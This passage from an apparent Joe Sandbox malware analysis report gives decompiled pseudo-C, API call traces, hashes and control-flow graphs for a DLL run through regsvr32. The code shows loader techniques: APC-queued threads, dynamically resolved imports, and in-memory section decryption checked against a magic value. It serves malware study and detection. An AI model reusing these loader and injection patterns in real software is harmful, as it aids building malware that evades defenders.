                                    • Sleep.KERNEL32(00000003,00000000,?,00000001), ref: 001A66BD
                                    • IsWow64Process.KERNEL32(00000190,?,?,00000001), ref: 001A66DB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                    • String ID:
                                    • API String ID: 3690864001-0
                                    • Opcode ID: 1b2813f47edca1570188c8ab0da0dc44722f9e9097376410a6b872997be39bde
                                    • Instruction ID: f4ee79164fe976048509c7fa318943530e2b3f2384e5544f3af732f642628da5
                                    • Opcode Fuzzy Hash: 1b2813f47edca1570188c8ab0da0dc44722f9e9097376410a6b872997be39bde
                                    • Instruction Fuzzy Hash: 5A21A2B6604304AFC710AFA5EC89A6A77ECEB463A4F54463EF619C2550E735C8C4CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 64%
                                    			E001A637D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _v8;
                                    				intOrPtr _t9;
                                    				intOrPtr _t13;
                                    				char* _t19;
                                    				char* _t28;
                                    				void* _t33;
                                    				void* _t34;
                                    				char* _t36;
                                    				void* _t38;
                                    				intOrPtr* _t39;
                                    				char* _t40;
                                    				char* _t42;
                                    				char* _t43;
                                    
                                    				_t34 = __edx;
                                    				_push(__ecx);
                                    				_t9 =  *0x1aa2d4; // 0x314d7d0
                                    				_t1 = _t9 + 0x1ab61b; // 0x253d7325
                                    				_t36 = 0;
                                    				_t28 = E001A2F3E(__ecx, _t1);
                                    				if(_t28 != 0) {
                                    					_t39 = __imp__;
                                    					_t13 =  *_t39(_t28, _t38);
                                    					_v8 = _t13;
                                    					_t6 =  *_t39(_a4) + 1; // 0x32f9859
                                    					_t40 = E001A77D7(_v8 + _t6);
                                    					if(_t40 != 0) {
                                    						strcpy(_t40, _t28);
                                    						_pop(_t33);
                                    						__imp__(_t40, _a4);
                                    						_t19 = E001A488A(_t33, _t34, _t40, _a8); // executed
                                    						_t36 = _t19;
                                    						E001A77EC(_t40);
                                    						_t42 = E001A1F34(StrTrimA(_t36, "="), _t36);
                                    						if(_t42 != 0) {
                                    							E001A77EC(_t36);
                                    							_t36 = _t42;
                                    						}
                                    						_t43 = E001A6006(_t36, _t33);
                                    						if(_t43 != 0) {
                                    							E001A77EC(_t36);
                                    							_t36 = _t43;
                                    						}
                                    					}
                                    					E001A77EC(_t28);
                                    				}
                                    				return _t36;
                                    			}

















                                    APIs
                                      • Part of subcall function 001A2F3E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001A6396,253D7325,00000000,00000000,?,00000000,001A72E3), ref: 001A2FA5
                                      • Part of subcall function 001A2F3E: sprintf.NTDLL ref: 001A2FC6
                                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                    • lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • strcpy.NTDLL ref: 001A63C7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A488A: lstrlen.KERNEL32(00000000,00000000,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A489B
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                      • Part of subcall function 001A1F34: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,001A63FB,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A1F3E
                                      • Part of subcall function 001A1F34: _snprintf.NTDLL ref: 001A1F9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                    • String ID: =
                                    • API String ID: 2864389247-1428090586
                                    • Opcode ID: d7747a1801284a8b80a26c645935a27c26ba61c3a9e0bc1bf3810e4c5fde9ddf
                                    • Instruction ID: 8bf6f73d4844b0ed23a916e177aa33f8cf932b29e3d1e9d93d6e21544daa21c6
                                    • Opcode Fuzzy Hash: d7747a1801284a8b80a26c645935a27c26ba61c3a9e0bc1bf3810e4c5fde9ddf
                                    • Instruction Fuzzy Hash: 3B11087F6012257B87127BB89D89C6F37AD9F9B7603094015F504A7202DF79CD0287E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentVariableW.KERNEL32(6E2D2C54,6E2F7270,00000747), ref: 6E2C2B6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentVariable
                                    • String ID: Hh/n$Hh/n$Hh/n$@/n
                                    • API String ID: 1431749950-535270782
                                    • Opcode ID: f63b7f15f736fea209288819a9ca910a68d64de919d64d5a4da6e080004eb9a7
                                    • Instruction ID: dc9a6c55ba6677a7f048176c3bcdf596a5d3d22773b235b844f8ab31100746e5
                                    • Opcode Fuzzy Hash: f63b7f15f736fea209288819a9ca910a68d64de919d64d5a4da6e080004eb9a7
                                    • Instruction Fuzzy Hash: E282C0B2958B168FCB44CF78D5D4559BBF2FB8A724F001A2DE486C7384D7349909CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 539 6e2c9aa1-6e2c9aba 540 6e2c9abc-6e2c9acc call 6e2ca5be 539->540 541 6e2c9ad0-6e2c9ad5 539->541 540->541 551 6e2c9ace 540->551 543 6e2c9ad7-6e2c9adf 541->543 544 6e2c9ae2-6e2c9b06 MultiByteToWideChar 541->544 543->544 545 6e2c9b0c-6e2c9b18 544->545 546 6e2c9c99-6e2c9cac call 6e2c3395 544->546 548 6e2c9b6c 545->548 549 6e2c9b1a-6e2c9b2b 545->549 555 6e2c9b6e-6e2c9b70 548->555 552 6e2c9b2d-6e2c9b3c call 6e2cd1a0 549->552 553 6e2c9b4a-6e2c9b5b call 6e2c6950 549->553 551->541 558 6e2c9c8e 552->558 565 6e2c9b42-6e2c9b48 552->565 553->558 566 6e2c9b61 553->566 555->558 559 6e2c9b76-6e2c9b89 MultiByteToWideChar 555->559 563 6e2c9c90-6e2c9c97 call 6e2c9a81 558->563 559->558 562 6e2c9b8f-6e2c9ba1 call 6e2c7160 559->562 568 6e2c9ba6-6e2c9baa 562->568 563->546 570 6e2c9b67-6e2c9b6a 565->570 566->570 568->558 571 6e2c9bb0-6e2c9bb7 568->571 570->555 572 6e2c9bb9-6e2c9bbe 571->572 573 6e2c9bf1-6e2c9bfd 571->573 572->563 574 6e2c9bc4-6e2c9bc6 572->574 575 6e2c9bff-6e2c9c10 573->575 576 6e2c9c49 573->576 574->558 577 6e2c9bcc-6e2c9be6 call 6e2c7160 574->577 579 6e2c9c2b-6e2c9c3c call 6e2c6950 575->579 580 6e2c9c12-6e2c9c21 call 6e2cd1a0 575->580 578 6e2c9c4b-6e2c9c4d 576->578 577->563 592 6e2c9bec 577->592 582 6e2c9c4f-6e2c9c68 call 6e2c7160 578->582 583 6e2c9c87-6e2c9c8d call 6e2c9a81 578->583 579->583 591 6e2c9c3e 579->591 580->583 595 6e2c9c23-6e2c9c29 580->595 582->583 597 6e2c9c6a-6e2c9c71 582->597 583->558 596 6e2c9c44-6e2c9c47 591->596 592->558 595->596 596->578 598 6e2c9cad-6e2c9cb3 597->598 599 6e2c9c73-6e2c9c74 597->599 600 6e2c9c75-6e2c9c85 WideCharToMultiByte 598->600 599->600 600->583 601 6e2c9cb5-6e2c9cbc call 6e2c9a81 600->601 601->563
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6E2C827C,00000000,?,?,?,6E2C9CF2,?,?,00000100), ref: 6E2C9AFB
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6E2C9CF2,?,?,00000100,5EFC4D8B,?,?), ref: 6E2C9B81
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2C9C7B
                                    • __freea.LIBCMT ref: 6E2C9C88
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    • __freea.LIBCMT ref: 6E2C9C91
                                    • __freea.LIBCMT ref: 6E2C9CB6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: e83c18b4f71d7a34b906d3e461668c7d5b8583a2e9aad466ebe2a92572652056
                                    • Instruction ID: 9baaed2376f720976d03a87f1f08c6f70d633366449656492a4840322c0ac807
                                    • Opcode Fuzzy Hash: e83c18b4f71d7a34b906d3e461668c7d5b8583a2e9aad466ebe2a92572652056
                                    • Instruction Fuzzy Hash: 8351D27261021BAFEB948FA4CC41EAB37ABEF84F18F110728EC14D6140EB34DD60C696
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    control_flow_graph 604 6e2a165d-6e2a166f call 6e2a2102 607 6e2a1730 604->607 608 6e2a1675-6e2a16aa GetModuleHandleA GetProcAddress 604->608 611 6e2a1737-6e2a173e 607->611 609 6e2a1728-6e2a172e call 6e2a2117 608->609 610 6e2a16ac-6e2a16c0 GetProcAddress 608->610 609->611 610->609 612 6e2a16c2-6e2a16d6 GetProcAddress 610->612 612->609 614 6e2a16d8-6e2a16ec GetProcAddress 612->614 614->609 616 6e2a16ee-6e2a1702 GetProcAddress 614->616 616->609 617 6e2a1704-6e2a1715 call 6e2a2013 616->617 619 6e2a171a-6e2a171f 617->619 619->609 620 6e2a1721-6e2a1726 619->620 620->611
                                    C-Code - Quality: 100%
                                    			E6E2A165D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                    				intOrPtr _v8;
                                    				_Unknown_base(*)()* _t29;
                                    				_Unknown_base(*)()* _t33;
                                    				_Unknown_base(*)()* _t36;
                                    				_Unknown_base(*)()* _t39;
                                    				_Unknown_base(*)()* _t42;
                                    				intOrPtr _t46;
                                    				struct HINSTANCE__* _t50;
                                    				intOrPtr _t56;
                                    
                                    				_t56 = E6E2A2102(0x20);
                                    				if(_t56 == 0) {
                                    					_v8 = 8;
                                    				} else {
                                    					_t50 = GetModuleHandleA( *0x6e2a41d0 + 0x6e2a5014);
                                    					_v8 = 0x7f;
                                    					_t29 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a50e1);
                                    					 *(_t56 + 0xc) = _t29;
                                    					if(_t29 == 0) {
                                    						L8:
                                    						E6E2A2117(_t56);
                                    					} else {
                                    						_t33 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a50f1);
                                    						 *(_t56 + 0x10) = _t33;
                                    						if(_t33 == 0) {
                                    							goto L8;
                                    						} else {
                                    							_t36 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a5104);
                                    							 *(_t56 + 0x14) = _t36;
                                    							if(_t36 == 0) {
                                    								goto L8;
                                    							} else {
                                    								_t39 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a5119);
                                    								 *(_t56 + 0x18) = _t39;
                                    								if(_t39 == 0) {
                                    									goto L8;
                                    								} else {
                                    									_t42 = GetProcAddress(_t50,  *0x6e2a41d0 + 0x6e2a512f);
                                    									 *(_t56 + 0x1c) = _t42;
                                    									if(_t42 == 0) {
                                    										goto L8;
                                    									} else {
                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                    										_t46 = E6E2A2013(_t56, _a12); // executed
                                    										_v8 = _t46;
                                    										if(_t46 != 0) {
                                    											goto L8;
                                    										} else {
                                    											 *_a16 = _t56;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}













                                    APIs
                                      • Part of subcall function 6E2A2102: HeapAlloc.KERNEL32(00000000,?,6E2A13AF,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A210E
                                    • GetModuleHandleA.KERNEL32(?,00000020), ref: 6E2A1681
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16A3
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16B9
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16CF
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16E5
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16FB
                                      • Part of subcall function 6E2A2013: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74EC1222,00000000,00000000), ref: 6E2A2070
                                      • Part of subcall function 6E2A2013: memset.NTDLL ref: 6E2A2092
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                    • String ID:
                                    • API String ID: 1632424568-0
                                    • Opcode ID: 96e6eb19699302e960186b9b28e13c66adc1322094157cda4a8a229fb5450125
                                    • Instruction ID: 0d26a908ec421bef6b339d921a8f9e5563fbea3e0a8e9d3cc9e2b0ad54048e5f
                                    • Opcode Fuzzy Hash: 96e6eb19699302e960186b9b28e13c66adc1322094157cda4a8a229fb5450125
                                    • Instruction Fuzzy Hash: 6A2167F560060A9FDB40DFADCC84E6A77EEEB49354B001525EA94E7200E730E90ACBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                    				long _v8;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				char _t9;
                                    				void* _t10;
                                    				void* _t18;
                                    				void* _t23;
                                    				void* _t36;
                                    
                                    				_push(__ecx);
                                    				_t9 = _a8;
                                    				_v8 = 1;
                                    				if(_t9 == 0) {
                                    					_t10 = InterlockedDecrement(0x6e2a4188);
                                    					__eflags = _t10;
                                    					if(_t10 == 0) {
                                    						__eflags =  *0x6e2a418c;
                                    						if( *0x6e2a418c != 0) {
                                    							_t36 = 0x2328;
                                    							while(1) {
                                    								SleepEx(0x64, 1);
                                    								__eflags =  *0x6e2a4198;
                                    								if( *0x6e2a4198 == 0) {
                                    									break;
                                    								}
                                    								_t36 = _t36 - 0x64;
                                    								__eflags = _t36;
                                    								if(_t36 > 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							CloseHandle( *0x6e2a418c);
                                    						}
                                    						HeapDestroy( *0x6e2a4190);
                                    					}
                                    				} else {
                                    					if(_t9 == 1 && InterlockedIncrement(0x6e2a4188) == 1) {
                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                    						_t41 = _t18;
                                    						 *0x6e2a4190 = _t18;
                                    						if(_t18 == 0) {
                                    							L6:
                                    							_v8 = 0;
                                    						} else {
                                    							 *0x6e2a41b0 = _a4;
                                    							asm("lock xadd [eax], edi");
                                    							_push( &_a8);
                                    							_t23 = E6E2A1000(E6E2A1FC9, E6E2A19C4(_a12, 1, 0x6e2a4198, _t41));
                                    							 *0x6e2a418c = _t23;
                                    							if(_t23 == 0) {
                                    								asm("lock xadd [esi], eax");
                                    								goto L6;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}













                                    APIs
                                    • InterlockedIncrement.KERNEL32(6E2A4188), ref: 6E2A17E6
                                    • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6E2A17FB
                                      • Part of subcall function 6E2A1000: CreateThread.KERNEL32(00000000,00000000,00000000,?,6E2A4198,6E2A1834), ref: 6E2A1017
                                      • Part of subcall function 6E2A1000: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E2A102C
                                      • Part of subcall function 6E2A1000: GetLastError.KERNEL32(00000000), ref: 6E2A1037
                                      • Part of subcall function 6E2A1000: TerminateThread.KERNEL32(00000000,00000000), ref: 6E2A1041
                                      • Part of subcall function 6E2A1000: CloseHandle.KERNEL32(00000000), ref: 6E2A1048
                                      • Part of subcall function 6E2A1000: SetLastError.KERNEL32(00000000), ref: 6E2A1051
                                    • InterlockedDecrement.KERNEL32(6E2A4188), ref: 6E2A184E
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 6E2A1868
                                    • CloseHandle.KERNEL32 ref: 6E2A1884
                                    • HeapDestroy.KERNEL32 ref: 6E2A1890
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                    • String ID:
                                    • API String ID: 2110400756-0
                                    • Opcode ID: 623b7cf9f5f29fe5cdca112f896d571793b8378202abc7ddf01f9410e82828be
                                    • Instruction ID: bfdf2b3ed9db63ad9087cf375e07e1fb800f26968b5eb72f225da6a801783f13
                                    • Opcode Fuzzy Hash: 623b7cf9f5f29fe5cdca112f896d571793b8378202abc7ddf01f9410e82828be
                                    • Instruction Fuzzy Hash: AB216DB1A0060EEFDB409FEDC88C95D7BABFB563B27154465E615D3140DB70C98ACB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E2A1000(long _a4, DWORD* _a12) {
                                    				_Unknown_base(*)()* _v0;
                                    				void* _t4;
                                    				long _t6;
                                    				long _t11;
                                    				void* _t13;
                                    
                                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2a41cc, 0, _a12); // executed
                                    				_t13 = _t4;
                                    				if(_t13 != 0) {
                                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                    					if(_t6 == 0) {
                                    						_t11 = GetLastError();
                                    						TerminateThread(_t13, _t11);
                                    						CloseHandle(_t13);
                                    						_t13 = 0;
                                    						SetLastError(_t11);
                                    					}
                                    				}
                                    				return _t13;
                                    			}









                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,00000000,?,6E2A4198,6E2A1834), ref: 6E2A1017
                                    • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6E2A102C
                                    • GetLastError.KERNEL32(00000000), ref: 6E2A1037
                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 6E2A1041
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1048
                                    • SetLastError.KERNEL32(00000000), ref: 6E2A1051
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                    • String ID:
                                    • API String ID: 3832013932-0
                                    • Opcode ID: 27b50cf6482c7e2aaf85893c68aa2be8a5e29ca39df46a807078fbffa498f446
                                    • Instruction ID: 2e96305cfc7e73b7cda5bda9b167327fa8c8164860f73c3eab10c3b5f039cd38
                                    • Opcode Fuzzy Hash: 27b50cf6482c7e2aaf85893c68aa2be8a5e29ca39df46a807078fbffa498f446
                                    • Instruction Fuzzy Hash: F3F08C32204E21FBCB225BA88C0CF4FBF6BFB0A722F014404FA0991040C7B18858DBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000747), ref: 6E2C3111
                                    • GetConsoleWindow.KERNEL32 ref: 6E2C3151
                                    • ShowWindow.USER32(00000000), ref: 6E2C3158
                                    • OpenMutexW.KERNEL32(001F0001,00000001,6E30C4C0,00000000,00000000), ref: 6E2C31C6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Window$ConsoleDirectoryMutexOpenShowSystem
                                    • String ID:
                                    • API String ID: 3443828520-0
                                    • Opcode ID: 0c6665df6eedfab903509f83552bbcb89350681b8aacdd18e3431a624f3cc3df
                                    • Instruction ID: c94bce9e671e558abe384574376b1be114c2007e7df0f8c44be863a388b6de4d
                                    • Opcode Fuzzy Hash: 0c6665df6eedfab903509f83552bbcb89350681b8aacdd18e3431a624f3cc3df
                                    • Instruction Fuzzy Hash: AE718A71AA0A158FDB00CF79E5DD5A97BF3FB46B247000A2AD84787354E774A409CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E6E2A18A0(void* __edi, intOrPtr _a4) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				unsigned int _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				void* _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				void* _v40;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				intOrPtr _t46;
                                    				void* _t53;
                                    				intOrPtr _t54;
                                    				intOrPtr _t57;
                                    				signed int _t66;
                                    				intOrPtr _t68;
                                    				intOrPtr _t83;
                                    				void* _t84;
                                    
                                    				_t83 =  *0x6e2a41b0;
                                    				_t46 = E6E2A1C00(_t83,  &_v24,  &_v16);
                                    				_v20 = _t46;
                                    				if(_t46 == 0) {
                                    					asm("sbb ebx, ebx");
                                    					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                    					_t84 = _t83 + _v24;
                                    					_v40 = _t84;
                                    					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
                                    					_v28 = _t53;
                                    					if(_t53 == 0) {
                                    						_v20 = 8;
                                    					} else {
                                    						_v8 = _v8 & 0x00000000;
                                    						if(_t66 <= 0) {
                                    							_t54 =  *0x6e2a41cc;
                                    						} else {
                                    							_t68 = _a4;
                                    							_t57 = _t53 - _t84;
                                    							_t13 = _t68 + 0x6e2a5137; // 0x6e2a5137
                                    							_v32 = _t57;
                                    							_v36 = _t57 + _t13;
                                    							_v12 = _t84;
                                    							while(1) {
                                    								asm("movsd");
                                    								asm("movsd");
                                    								asm("movsd");
                                    								E6E2A116D(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
                                    								_v12 = _v12 + 0x1000;
                                    								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                    								_v8 = _v8 + 1;
                                    								 *0x6e2a41cc = _t54;
                                    								if(_v8 >= _t66) {
                                    									break;
                                    								}
                                    								_t57 = _v32;
                                    							}
                                    						}
                                    						if(_t54 != 0x69b25f44) {
                                    							_v20 = 9;
                                    						} else {
                                    							memcpy(_v40, _v28, _v16);
                                    						}
                                    						VirtualFree(_v28, 0, 0x8000); // executed
                                    					}
                                    				}
                                    				return _v20;
                                    			}























                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,6E2A1A70,00003000,00000004,?,?,6E2A1A70,00000001), ref: 6E2A18F6
                                    • memcpy.NTDLL(?,?,6E2A1A70,?,?,6E2A1A70,00000001), ref: 6E2A1991
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E2A1A70,00000001), ref: 6E2A19AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreememcpy
                                    • String ID: Sep 20 2021
                                    • API String ID: 4010158826-2355132765
                                    • Opcode ID: 81ffbda6c00a3fd44540eb39b2525d9800997f248454ae4496751ab03e2db719
                                    • Instruction ID: 327c513ec64ca37aaf70fc272ae32c01ffbd939fef6206f269d1f695e2bf2447
                                    • Opcode Fuzzy Hash: 81ffbda6c00a3fd44540eb39b2525d9800997f248454ae4496751ab03e2db719
                                    • Instruction Fuzzy Hash: CD312CB5D0021EAFDB00CFD8C984BEEB7BAFF05314F104169EA15A7240D771AA46CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278), ref: 6E2C6F59
                                    • GetLastError.KERNEL32(?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278,6E2CF270,6E2CF278,00000000,00000364,?,6E2C6E0E), ref: 6E2C6F65
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E2C6ECE,?,00000000,00000000,00000000,?,6E2C70CC,00000006,6E2CF278,6E2CF270,6E2CF278,00000000), ref: 6E2C6F73
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 9a15c5e14e80845591abcc941fef0f99832271df9e0f79579d2f316929119eb4
                                    • Instruction ID: 398e9212b6f42a3c1c031b282fd0ddafdf4f0c610d69838fc48bf1b30d5f0ee7
                                    • Opcode Fuzzy Hash: 9a15c5e14e80845591abcc941fef0f99832271df9e0f79579d2f316929119eb4
                                    • Instruction Fuzzy Hash: 9701D83227562B5FDB914AA9CC9DE6677AAAF0BF617100720F91AD3240C720D800C6F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E6E2A1FC9(void* __ecx, intOrPtr _a4) {
                                    				long _t3;
                                    				int _t4;
                                    				int _t9;
                                    				void* _t13;
                                    
                                    				_t13 = GetCurrentThread();
                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                    				if(_t3 != 0) {
                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                    				}
